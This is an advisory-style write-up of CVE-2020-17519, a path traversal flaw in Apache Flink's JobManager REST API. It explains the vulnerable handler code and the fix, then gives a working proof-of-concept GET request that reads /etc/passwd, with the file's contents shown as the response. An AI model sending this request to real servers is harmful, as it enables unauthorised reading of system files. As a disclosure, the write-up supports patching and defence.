[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read

---

Apache Flink is a framework and distributed processing engine for stateful computations over unbounded and bounded data streams which developed using Java and Scala. A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the RESTful API of the JobManager process. Access to filesystem is restricted to files accessible by the JobManager process.

While all versions between 1.11.0 - 1.11.2 are affected the related vulnerability, Apache Flink has fixed vulnerability for versions 1.11.3 and above.

Vulnerable code is src/main/java/org/apache/flink/runtime/rest/handler/cluster/JobManagerCustomLogHandler.java class. Related code snippet is down below.

		if (logDir == null) {
			return null;
		}
		String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
		return new File(logDir, filename);
	}
}

The problem is that the request handler enables to direct access to file path. With this commit, vulnerable line of code has been changed as below. In the code snippet below, the vulnerable line is marked as comment line.

		if (logDir == null) {
			return null;
		}
		// String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
		String filename = new File(handlerRequest.getPathParameter(LogFileNamePathParameter.class)).getName();
		return new File(logDir, filename);
	}
}

Proof of Concept (PoC): In order to exploit this vulnerability, you can use the following request

GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
Host: vulnerablehost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

Response of the above request is down below

HTTP/1.1 200 OK
Content-Type: text/plain
content-length: 964

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flink:x:9999:9999::/opt/flink:/bin/sh

Also, there is a metasploit module available for CVE-2020-17519 with Excellent ranking. You can find out ruby codes in here